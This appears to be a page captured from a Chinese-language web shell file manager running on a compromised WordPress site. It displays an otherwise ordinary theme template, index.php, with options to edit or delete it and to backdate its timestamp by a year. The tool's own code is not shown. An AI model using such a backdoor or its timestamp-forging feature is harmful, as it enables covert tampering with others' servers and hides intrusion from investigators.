文件操作 - index.php
返回文件管理
返回主菜单
删除本文件
文件: /var/www/ltlcompare.com/wp-content/themes/ltl-compare/index.php
编辑文件内容
<?php get_header(); ?> <?php the_post(); ?> <main class="page-main"> <div class="container"> <?php include( TEMPLATEPATH. '/inc/breadcrumbs.php' ) ?> <h1 class="section-title"><?php the_title(); ?></h1> <?php if ( has_post_thumbnail() ) : ?> <div class="single-thumbnail cover-img"> <img src="<?php echo get_the_post_thumbnail_url( $post->ID, 'large' ); ?>" srcset="<?php echo get_the_post_thumbnail_url( $post->ID, 'full' ); ?> 2x" alt="<?php echo get_post_meta( get_post_thumbnail_id( $post->ID ), '_wp_attachment_image_alt', true ); ?>" > </div> <?php endif; ?> <div class="content-text"> <?php the_content(); ?> </div> </div> </main> <?php get_footer(); ?>
修改文件时间
将文件时间修改为当前时间的前一年
删除文件